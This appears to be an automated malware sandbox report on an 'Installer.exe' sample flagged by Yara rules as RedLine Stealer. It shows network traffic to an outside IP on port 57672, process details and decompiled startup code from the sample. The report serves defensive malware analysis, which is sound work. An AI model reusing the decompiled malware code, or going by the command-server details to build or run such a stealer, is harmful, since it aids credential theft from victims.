                                                                                                                                                                  Jan 25, 2023 09:37:32.404510021 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.404519081 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:32.404546022 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.404578924 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.404601097 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:32.404613972 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.404649019 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.404791117 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.404829025 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.404926062 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.404959917 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405730009 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405766964 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405797958 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405833006 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405865908 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405899048 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405930042 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405962944 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.405996084 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.427726030 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428148985 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428188086 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428220987 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428349972 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428477049 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428508997 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428654909 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428839922 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.428915977 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.429002047 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.429086924 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.429203033 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.429385900 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.429420948 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.456727028 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.510556936 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:32.906589985 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:32.955909967 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:32.958586931 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:33.007859945 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:33.020564079 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:33.070151091 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:33.071563005 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:33.120893002 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:33.121438980 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:33.170761108 CET576724969782.115.223.46192.168.2.4
                                                                                                                                                                  Jan 25, 2023 09:37:33.213663101 CET4969757672192.168.2.482.115.223.46
                                                                                                                                                                  Jan 25, 2023 09:37:34.220170021 CET4969757672192.168.2.482.115.223.46

                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:09:37:01
                                                                                                                                                                  Start date:25/01/2023
                                                                                                                                                                  Path:C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Users\user\Desktop\Installer.exe
                                                                                                                                                                  Imagebase:0x120000
                                                                                                                                                                  File size:2306455 bytes
                                                                                                                                                                  MD5 hash:F62872FE4592273ABDA6F704FB27B3EC
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.304751719.0000000001432000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.306753398.00000000013D5000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:low

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:09:37:02
                                                                                                                                                                  Start date:25/01/2023
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7c72c0000
                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:09:37:03
                                                                                                                                                                  Start date:25/01/2023
                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                  Imagebase:0x40000
                                                                                                                                                                  File size:98912 bytes
                                                                                                                                                                  MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.370528626.00000000041C2000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:5.7%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:9.8%
                                                                                                                                                                    Total number of Nodes:255
                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                    execution_graph 1345 121110 __getmainargs 1346 122490 1347 1224b0 RtlEnterCriticalSection 1346->1347 1348 1224a1 1346->1348 1349 1224e1 RtlLeaveCriticalSection 1347->1349 1351 1224ca 1347->1351 1350 122506 ??3@YAXPAX 1350->1349 1351->1349 1351->1350 1442 121150 1443 121410 GetStartupInfoA 1442->1443 1449 121180 1442->1449 1444 121421 _cexit 1443->1444 1446 121440 _initterm 1444->1446 1445 12119b Sleep 1445->1449 1447 1213c3 _amsg_exit 1448 1213dd _initterm 1447->1448 1447->1449 1448->1449 1449->1445 1449->1446 1449->1447 1449->1448 1450 121eb0 12 API calls 1449->1450 1451 12121c SetUnhandledExceptionFilter 1450->1451 1452 12123d 1451->1452 1453 121242 __p__acmdln 1452->1453 1454 1212d2 malloc 1452->1454 1455 121310 strlen malloc memcpy 1452->1455 1456 12146b exit 1452->1456 1457 121b40 _onexit 1452->1457 1458 12190b 5 API calls 1452->1458 1459 121399 1452->1459 1453->1452 1454->1452 1455->1452 1455->1455 1456->1442 1457->1452 1458->1452 1459->1444 1460 1213a3 1459->1460 1243 121299 1259 121150 1243->1259 1244 1212d2 malloc 1244->1259 1245 121310 strlen malloc memcpy 1245->1245 1245->1259 1246 12146b exit 1246->1259 1248 121410 GetStartupInfoA 1250 121421 _cexit 1248->1250 1253 121440 _initterm 1250->1253 1251 121399 1251->1250 1255 1213a3 1251->1255 1252 12119b Sleep 1252->1259 1254 1213c3 _amsg_exit 1256 1213dd _initterm 1254->1256 1254->1259 1256->1259 1258 12121c SetUnhandledExceptionFilter 1258->1259 1259->1244 1259->1245 1259->1246 1259->1248 1259->1251 1259->1252 1259->1253 1259->1254 1259->1256 1260 121242 __p__acmdln 1259->1260 1261 121eb0 1259->1261 1277 121b40 1259->1277 1282 12190b 1259->1282 1260->1259 1262 121ed0 1261->1262 1276 121ec5 1261->1276 1263 122120 1262->1263 1265 122160 1262->1265 1273 122070 1262->1273 1274 121fa6 1262->1274 1262->1276 1264 122131 1263->1264 1263->1276 1268 122158 1264->1268 1317 121d50 1264->1317 1267 121cf0 11 API calls 1265->1267 1269 12217a 1267->1269 1268->1273 1269->1258 1270 121d50 11 API calls 1270->1274 1272 1220a2 VirtualProtect 1272->1273 1273->1272 1273->1276 1274->1262 1274->1270 1275 121cf0 11 API calls 1274->1275 1291 121cf0 1274->1291 1275->1274 1276->1258 1278 121b49 1277->1278 1280 121af0 1277->1280 1278->1259 1341 1214a0 _onexit 1280->1341 1281 121b1b 1281->1259 1283 121926 1282->1283 1284 121b40 _onexit 1283->1284 1285 12192d IsProcessorFeaturePresent FreeConsole 1284->1285 1286 121961 1285->1286 1287 12197f memcpy 1286->1287 1290 121a17 1286->1290 1288 1219dc 1287->1288 1342 1216ab 1288->1342 1290->1259 1339 122a10 1291->1339 1293 121d04 fwrite 1340 122a10 1293->1340 1295 121d30 vfprintf abort 1301 121d50 1295->1301 1296 121e02 1296->1262 1297 121e97 1298 121cf0 4 API calls 1297->1298 1311 121ea7 1298->1311 1299 121dbd VirtualQuery 1300 121e77 1299->1300 1299->1301 1300->1297 1302 121cf0 4 API calls 1300->1302 1301->1296 1301->1297 1301->1299 1303 121e10 VirtualProtect 1301->1303 1302->1297 1303->1296 1304 121e50 GetLastError 1303->1304 1305 121cf0 4 API calls 1304->1305 1305->1301 1306 122160 1309 121cf0 4 API calls 1306->1309 1307 121d50 4 API calls 1308 122120 1307->1308 1308->1307 1312 122070 1308->1312 1316 121ec5 1308->1316 1310 12217a 1309->1310 1310->1262 1311->1306 1311->1308 1311->1312 1314 121cf0 VirtualQuery VirtualProtect GetLastError VirtualProtect 1311->1314 1315 121d50 VirtualQuery VirtualProtect GetLastError VirtualProtect 1311->1315 1311->1316 1313 1220a2 VirtualProtect 1312->1313 1312->1316 1313->1312 1314->1311 1315->1311 1316->1262 1323 121d64 1317->1323 1318 121e02 1318->1264 1319 121e97 1320 121cf0 7 API calls 1319->1320 1328 121ea7 1320->1328 1321 121dbd VirtualQuery 1322 121e77 1321->1322 1321->1323 1322->1319 1324 121cf0 7 API calls 1322->1324 1323->1318 1323->1319 1323->1321 1325 121e10 VirtualProtect 1323->1325 1324->1319 1325->1318 1326 121e50 GetLastError 1325->1326 1327 121cf0 7 API calls 1326->1327 1327->1323 1329 122160 1328->1329 1331 122120 1328->1331 1334 121d50 7 API calls 1328->1334 1335 122070 1328->1335 1336 121cf0 7 API calls 1328->1336 1338 121ec5 1328->1338 1332 121cf0 7 API calls 1329->1332 1330 121d50 7 API calls 1330->1331 1331->1330 1331->1335 1331->1338 1333 12217a 1332->1333 1333->1264 1334->1328 1337 1220a2 VirtualProtect 1335->1337 1335->1338 1336->1328 1337->1335 1338->1264 1339->1293 1340->1295 1341->1281 1343 1216d9 VirtualProtect 1342->1343 1343->1290 1352 122419 1353 122420 calloc 1352->1353 1354 12243a RtlEnterCriticalSection RtlLeaveCriticalSection 1353->1354 1355 122410 1353->1355 1355->1353 1461 12125c 1463 121150 1461->1463 1462 1212d2 malloc 1462->1463 1463->1462 1464 121310 strlen malloc memcpy 1463->1464 1465 12146b exit 1463->1465 1466 121b40 _onexit 1463->1466 1467 121410 GetStartupInfoA 1463->1467 1468 12190b 5 API calls 1463->1468 1470 121399 1463->1470 1471 12119b Sleep 1463->1471 1472 121440 _initterm 1463->1472 1473 1213c3 _amsg_exit 1463->1473 1475 1213dd _initterm 1463->1475 1476 121eb0 12 API calls 1463->1476 1478 121242 __p__acmdln 1463->1478 1464->1463 1464->1464 1465->1463 1466->1463 1469 121421 _cexit 1467->1469 1468->1463 1469->1472 1470->1469 1474 1213a3 1470->1474 1471->1463 1473->1463 1473->1475 1475->1463 1477 12121c SetUnhandledExceptionFilter 1476->1477 1477->1463 1478->1463 1479 12155c 1480 12156f 1479->1480 1481 121581 FreeLibrary 1480->1481 1482 12158d 1480->1482 1481->1482 1356 122400 1357 122420 calloc 1356->1357 1358 122410 1356->1358 1357->1358 1359 12243a RtlEnterCriticalSection RtlLeaveCriticalSection 1357->1359 1358->1357 1483 1214c0 GetModuleHandleA 1484 12151c 1483->1484 1485 1214dd LoadLibraryA GetProcAddress GetProcAddress 1483->1485 1488 1214a0 _onexit 1484->1488 1485->1484 1487 121542 1488->1487 1489 1226c0 strlen 1490 1226da 1489->1490 1491 122736 1489->1491 1490->1491 1492 12271e _strncoll 1490->1492 1492->1490 1492->1491 1360 121001 1364 121010 1360->1364 1361 1210a0 __set_app_type 1363 121070 __p__fmode __p__commode 1361->1363 1362 121064 __set_app_type 1362->1363 1365 12108f 1363->1365 1364->1361 1364->1362 1366 121098 1365->1366 1369 1221d0 1365->1369 1370 122a48 __setusermatherr 1369->1370 1493 1225c7 1494 1225d0 1493->1494 1495 122610 RtlInitializeCriticalSection 1494->1495 1496 1225d9 1494->1496 1495->1496 1389 121b8c 1390 121b90 1389->1390 1393 122520 1390->1393 1392 121ba8 1394 1225d0 1393->1394 1395 122531 1393->1395 1396 122610 RtlInitializeCriticalSection 1394->1396 1397 1225d9 1394->1397 1398 122570 1395->1398 1401 122535 1395->1401 1396->1397 1397->1392 1399 122579 1398->1399 1406 122390 RtlEnterCriticalSection 1398->1406 1402 1225a1 RtlDeleteCriticalSection 1399->1402 1404 122590 ??3@YAXPAX 1399->1404 1405 12254c 1399->1405 1403 122390 4 API calls 1401->1403 1401->1405 1402->1405 1403->1405 1404->1402 1404->1404 1405->1392 1407 1223e5 RtlLeaveCriticalSection 1406->1407 1409 1223b1 1406->1409 1407->1399 1408 1223c0 TlsGetValue GetLastError 1408->1409 1409->1407 1409->1408 1497 121b70 1498 121b7c 1497->1498 1499 121b80 1498->1499 1500 122520 7 API calls 1498->1500 1501 121ba8 1500->1501 1410 121437 1411 121440 _initterm 1410->1411 1502 1225f7 1503 122600 1502->1503 1504 122390 4 API calls 1503->1504 1505 12254c 1504->1505 1412 1222b9 1413 1222c0 signal 1412->1413 1414 122330 signal 1413->1414 1415 122210 1413->1415 1422 122263 1414->1422 1416 1222f1 signal 1415->1416 1417 122242 signal 1415->1417 1420 12227a signal 1415->1420 1415->1422 1416->1415 1418 12230a signal 1416->1418 1417->1415 1419 12236a signal 1417->1419 1418->1422 1419->1422 1420->1415 1421 12234e signal 1420->1421 1421->1422 1506 1224f9 1507 122500 ??3@YAXPAX 1506->1507 1509 1224e1 RtlLeaveCriticalSection 1507->1509 1510 121ffc 1520 121f2f 1510->1520 1511 121cf0 11 API calls 1511->1520 1512 122160 1519 121cf0 11 API calls 1512->1519 1513 121d50 11 API calls 1517 122120 1513->1517 1514 1220a2 VirtualProtect 1515 122070 1514->1515 1515->1514 1518 121ec5 1515->1518 1516 121d50 11 API calls 1516->1520 1517->1513 1517->1515 1517->1518 1521 12217a 1519->1521 1520->1511 1520->1512 1520->1515 1520->1516 1520->1517 1520->1518 1522 121c60 1523 121c78 1522->1523 1524 121ca3 fprintf 1523->1524 1525 1221e0 1526 1221f3 1525->1526 1529 1221fe 1525->1529 1527 1222c0 signal 1526->1527 1526->1529 1527->1529 1533 122330 signal 1527->1533 1528 1222f1 signal 1528->1529 1532 12230a signal 1528->1532 1529->1528 1530 12227a signal 1529->1530 1531 122242 signal 1529->1531 1536 122263 1529->1536 1530->1529 1535 12234e signal 1530->1535 1531->1529 1534 12236a signal 1531->1534 1532->1536 1533->1536 1534->1536 1535->1536 1428 122227 1433 122210 1428->1433 1429 1222f1 signal 1431 12230a signal 1429->1431 1429->1433 1430 122242 signal 1432 12236a signal 1430->1432 1430->1433 1436 122263 1431->1436 1432->1436 1433->1429 1433->1430 1434 12227a signal 1433->1434 1433->1436 1434->1433 1435 12234e signal 1434->1435 1435->1436 1437 1224a9 1438 1224b0 RtlEnterCriticalSection 1437->1438 1439 1224e1 RtlLeaveCriticalSection 1438->1439 1440 1224ca 1438->1440 1440->1439 1441 122506 ??3@YAXPAX 1440->1441 1441->1439

                                                                                                                                                                    Callgraph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                    • Disassembly available
                                                                                                                                                                    callgraph 0 Function_00121110 1 Function_00122A10 2 Function_00122419 3 Function_0012251C 4 Function_00122800 13 Function_00122630 4->13 5 Function_00122400 6 Function_00122A00 7 Function_00121001 49 Function_00121B60 7->49 82 Function_001221D0 7->82 8 Function_00126A04 9 Function_0012190B 23 Function_0012162F 9->23 36 Function_00121B40 9->36 55 Function_00121590 9->55 74 Function_001216AB 9->74 84 Function_001218D1 9->84 91 Function_001229C0 9->91 10 Function_0012480F 11 Function_0012290C 11->13 12 Function_0012A60D 14 Function_00124430 15 Function_0012B331 16 Function_00121437 17 Function_00121B39 18 Function_0012A722 19 Function_00122520 54 Function_00122390 19->54 105 Function_00121CE0 19->105 20 Function_00122227 20->105 21 Function_0012AE27 22 Function_00124228 24 Function_0012482F 25 Function_00122750 25->13 26 Function_00121D50 26->25 26->26 48 Function_00122860 26->48 83 Function_001227D0 26->83 26->91 98 Function_00121CF0 26->98 27 Function_00121150 27->6 27->9 27->36 66 Function_00121EB0 27->66 27->105 28 Function_0012B05A 29 Function_0012575A 30 Function_00127158 31 Function_00122659 32 Function_00122559 32->105 33 Function_0012125C 33->6 33->9 33->36 33->66 33->105 34 Function_0012155C 35 Function_00125843 72 Function_001214A0 36->72 37 Function_00127647 38 Function_00122649 39 Function_00121C49 40 Function_0012274C 41 Function_0022D840 42 Function_00121B70 42->19 43 Function_00127475 44 Function_00122679 45 Function_00238948 45->41 92 Function_0022D7F6 45->92 46 Function_0012417C 47 Function_00121C60 47->1 48->13 50 Function_00124265 51 Function_0012BC65 52 Function_00122490 53 Function_00122890 53->13 56 Function_00121491 57 Function_0012B495 58 Function_00121299 58->6 58->9 58->36 58->66 58->105 59 Function_00128B9C 60 Function_0012B09D 61 Function_00124683 62 Function_00121289 62->6 62->9 62->36 62->66 62->105 63 Function_00121B8C 63->19 64 Function_0012298C 65 Function_00126FB2 66->26 66->83 66->91 66->98 67 Function_00121AB0 68 Function_001245B4 69 Function_001222B9 69->105 70 Function_00121BB9 70->19 71 Function_001248BF 73 Function_001247A5 75 Function_001246AB 76 Function_00126CAB 77 Function_001224A9 78 Function_001288A9 79 Function_001244AC 80 Function_0012ACD3 81 Function_0012B4D3 83->13 85 Function_001244D1 86 Function_001286D4 87 Function_0012B5DE 88 Function_00121ADC 89 Function_001214C0 89->72 90 Function_001226C0 90->13 92->41 93 Function_001225C7 94 Function_001227C9 95 Function_001221CC 96 Function_001243F2 97 Function_001246F0 98->1 98->25 98->26 98->48 98->83 98->91 98->98 99 Function_001229F0 100 Function_001225F7 100->54 101 Function_001224F9 102 Function_001229F9 103 Function_00121FFC 103->26 103->98 104 Function_001245FC 106 Function_001221E0 106->105

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00121150 Relevance: 19.7, APIs: 13, Instructions: 206sleepstringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 121150-12117a 1 121410-121419 GetStartupInfoA 0->1 2 121180-121191 0->2 4 121421-121436 _cexit 1->4 3 1211a7-1211b3 2->3 5 121193-121195 3->5 6 1211b5-1211bf 3->6 9 121440-12145e _initterm 4->9 7 1213b0-1213bd 5->7 8 12119b-1211a4 Sleep 5->8 10 1213c3-1213d7 _amsg_exit 6->10 11 1211c5-1211cc 6->11 7->10 7->11 8->3 12 1211ea-1211ec 10->12 13 1213dd-1213fd _initterm 10->13 11->9 14 1211d2-1211e4 11->14 15 1211f2-1211f9 12->15 16 121403-121409 12->16 13->15 13->16 14->12 14->13 17 121217-121257 call 121eb0 SetUnhandledExceptionFilter call 122a00 call 121ce0 __p__acmdln 15->17 18 1211fb-121214 15->18 16->15 26 121271-121277 17->26 27 121259 17->27 18->17 28 121260-121262 26->28 29 121279-121284 26->29 30 1212b4-1212bc 27->30 34 121290-121292 28->34 35 121264-121267 28->35 31 12126e 29->31 32 1212d2-1212f2 malloc 30->32 33 1212be-1212c7 30->33 31->26 40 121463 32->40 41 1212f8-121309 32->41 38 1212c9 33->38 39 1212cd 33->39 36 121294 34->36 37 1212a5-1212ad 34->37 35->34 42 121269 35->42 43 1212af 36->43 37->43 44 1212a0-1212a3 37->44 38->39 39->32 47 12146b-12148a exit 40->47 45 121310-121344 strlen malloc memcpy 41->45 42->31 43->30 44->37 44->43 45->45 46 121346-121393 call 121b40 call 12190b 45->46 46->47 52 121399-1213a1 46->52 47->0 52->4 53 1213a3-1213ae 52->53
                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                    			E00121150(char _a4) {
				void* _v24;
				signed short _v52;
				signed char _v56;
				char _v100;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				void* _v136;
				signed int _v140;
				void* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t44;
				_Unknown_base(*)()* _t46;
				signed int* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t54;
				signed int _t57;
				intOrPtr _t59;
				signed int _t61;
				void* _t63;
				signed int _t66;
				signed int _t72;
				signed int _t74;
				void* _t77;
				char* _t80;
				signed int _t83;
				struct _STARTUPINFOA* _t89;
				signed int _t90;
				signed int _t91;
				signed int* _t92;
				signed int* _t93;
				signed int _t98;
				signed int* _t101;
				intOrPtr _t104;
				signed int _t105;
				signed int _t108;
				signed int _t113;
				void* _t116;
				signed int* _t117;
				intOrPtr* _t135;

				L0:
				while(1) {
					L0:
					_t80 =  &_a4;
					_push( *((intOrPtr*)(_t80 - 4)));
					_t89 =  &_v100;
					_push(_t80);
					memset(_t89, 0, 0x11 << 2);
					_t116 = (_t113 & 0xfffffff0) - 0x78 + 0xc;
					if( *0x151064 != 0) {
						GetStartupInfoA(_t89);
						_t116 = _t116 - 4;
					}
					_t98 =  *( *[fs:0x18] + 4);
					_t104 =  *0x152260;
					while(1) {
						L4:
						asm("lock cmpxchg [0x1510c0], edi");
						if(0 == 0) {
							break;
						}
						L2:
						__eflags = _t98;
						if(_t98 == 0) {
							L36:
							_t72 = 1;
							__eflags =  *0x1510c4 - 1;
							if( *0x1510c4 != 1) {
								L6:
								if( *0x1510c4 == 0) {
									_v140 = 0x153014;
									_v144 = 0x15300c;
									 *0x1510c4 = 1;
									L00122A60();
								} else {
									 *0x151008 = 1;
								}
								if( *0x1510c4 == 1) {
									L38:
									_v140 = 0x153008;
									_v144 = 0x153000;
									L00122A60();
									 *0x1510c4 = 2;
									__eflags = _t72;
									if(_t72 != 0) {
										goto L10;
									}
									goto L39;
								} else {
									L9:
									if(_t72 == 0) {
										L39:
										_t32 = _t72;
										_t72 =  *0x1510c0;
										 *0x1510c0 = _t32;
									}
									L10:
									_t44 =  *0x14fadc; // 0x121bc0
									if(_t44 != 0) {
										_v136 = 0;
										_v140 = 2;
										_v144 = 0;
										 *_t44();
										_t116 = _t116 - 0xc;
									}
									E00121EB0(_t72, _t98, _t104);
									_v144 = E001221E0; // executed
									_t46 = SetUnhandledExceptionFilter(??); // executed
									_t117 = _t116 - 4;
									 *0x15107c = _t46;
									 *_t117 = 0x121000;
									_t48 = E00121CE0(E00122A00());
									 *0x1510bc = 0x120000;
									L00122A28();
									_t83 = 0;
									_t49 =  *_t48;
									if(_t49 != 0) {
										while(1) {
											L18:
											_t90 =  *_t49 & 0x000000ff;
											__eflags = _t90 - 0x20;
											if(_t90 <= 0x20) {
												goto L14;
											}
											L19:
											__eflags = _t90 - 0x22;
											_t83 =  ==  ? _t83 ^ 0x00000001 : _t83;
											L17:
											_t49 = _t49 + 1;
											__eflags = _t49;
											L18:
											_t90 =  *_t49 & 0x000000ff;
											__eflags = _t90 - 0x20;
											if(_t90 <= 0x20) {
												goto L14;
											}
											goto L19;
											L14:
											__eflags = _t90;
											if(_t90 == 0) {
												L20:
												__eflags = _t90;
												if(_t90 != 0) {
													while(1) {
														L23:
														_t49 = _t49 + 1;
														_t91 =  *_t49 & 0x000000ff;
														__eflags = _t91;
														if(_t91 == 0) {
															break;
														}
														L22:
														__eflags = _t91 - 0x20;
														if(_t91 > 0x20) {
															break;
														}
													}
													L24:
													 *0x1510b8 = _t49;
													goto L25;
												}
												L21:
												goto L24;
											}
											L15:
											__eflags = _t83 & 0x00000001;
											if((_t83 & 0x00000001) == 0) {
												goto L20;
											}
											L16:
											_t83 = 1;
											goto L17;
										}
									} else {
										L13:
										L25:
										if( *0x151064 != 0) {
											_t66 = 0xa;
											if((_v56 & 0x00000001) != 0) {
												_t66 = _v52 & 0x0000ffff;
											}
											 *0x123000 = _t66;
										}
										_t74 =  *0x15101c;
										_t105 = 4 + _t74 * 4;
										 *_t117 = _t105;
										_t50 = malloc(??);
										_t92 =  *0x151018;
										_v120 = _t50;
										if(_t74 <= 0) {
											L43:
											_t51 = _v120;
											goto L33;
										} else {
											L30:
											_t77 = _t50;
											_t15 = _t105 - 4; // 0x7471648c
											_t59 = _t15;
											_t101 = _t92;
											_v124 = _t59;
											_v116 = _t59 + _t92;
											do {
												L31:
												_t61 =  *_t101;
												_t77 = _t77 + 4;
												_t101 =  &(_t101[1]);
												 *_t117 = _t61;
												_t18 = strlen(??) + 1; // 0x1
												_t108 = _t18;
												 *_t117 = _t108;
												_t63 = malloc(??);
												 *(_t77 - 4) = _t63;
												_v140 = _t108;
												_v144 =  *((intOrPtr*)(_t101 - 4));
												 *_t117 = _t63;
												memcpy(??, ??, ??);
											} while (_v116 != _t101);
											_t51 = _v124 + _v120;
											_t135 = _t51;
											L33:
											 *_t51 = 0;
											 *0x151018 = _v120;
											E00121B40();
											_t54 =  *0x151014;
											_t93 =  *0x152278; // 0x7623608c
											 *_t93 = _t54;
											_v140 = _t54;
											_v144 =  *0x151018;
											 *_t117 =  *0x15101c; // executed
											_t57 = E0012190B(_t135); // executed
											 *0x151010 = _t57;
											if( *0x15100c == 0) {
												L44:
												 *_t117 = _t57; // executed
												exit(??); // executed
												 *0x151064 = 1;
												goto L0;
											}
											L34:
											if( *0x151008 == 0) {
												L00122A58();
												return  *0x151010;
											} else {
												return _t57;
											}
										}
									}
								}
							}
							L37:
							_v144 = 0x1f;
							L00122A50();
							__eflags =  *0x1510c4 - 1;
							if( *0x1510c4 != 1) {
								goto L9;
							}
							goto L38;
						}
						L3:
						Sleep(0x3e8);
						_t116 = _t116 - 4;
					}
					L5:
					_t72 = 0;
					if( *0x1510c4 == 1) {
						goto L37;
					}
					goto L6;
				}
			}
















































                                                                                                                                                                    0x00121150
                                                                                                                                                                    0x00121150
                                                                                                                                                                    0x00121150
                                                                                                                                                                    0x00121150
                                                                                                                                                                    0x00121159
                                                                                                                                                                    0x00121161
                                                                                                                                                                    0x00121167
                                                                                                                                                                    0x00121176
